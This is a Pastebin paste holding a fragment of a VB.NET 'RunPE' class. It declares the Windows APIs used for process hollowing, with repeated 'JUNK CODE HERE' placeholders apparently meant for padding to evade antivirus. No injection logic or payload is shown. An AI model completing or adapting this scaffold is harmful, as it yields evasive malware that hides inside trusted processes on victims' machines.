Advertisement
Guest User

Untitled

a guest
Jun 24th, 2017
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.35 KB | None | 0 0
  1. 23.Public Class RunPE
  2. JUNK CODE HERE
  3. 24. <DllImport("kernel32")> _
  4. 25. Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As System.Text.StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
  5.  
  6. JUNK CODE HERE
  7. 26. ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  8. 27. End Function
  9. JUNK CODE HERE
  10. 28. <DllImport("kernel32")> _
  11. 29. Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  12. 30. End Function
  13.  
  14. JUNK CODE HERE
  15.  
  16. 31. <DllImport("ntdll")> _
  17. 32. Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
  18. 33. End Function
  19.  
  20. JUNK CODE HERE
  21.  
  22. 34. <DllImport("kernel32")> _
  23. 35. Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  24. 36. End Function
  25. 37. <DllImport("kernel32.dll")> _
  26. 38. Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
  27. 39. End Function
  28. 40. <DllImport("kernel32")> _
  29. 41. Private Shared Function SetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  30. 42. End Function
  31.  
  32. JUNK CODE HERE
  33. 43. <DllImport("kernel32")> _
  34. 44. Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
  35. 45. End Function
  36.  
  37. JUNK CODE HERE
  38.  
  39. 46. <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
  40. 47. Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
  41. 48. End Function
  42. JUNK CODE HERE
  43. 49. <DllImport("kernel32.dll", SetLastError:=True)> _
  44. 50. Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
  45. 51. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement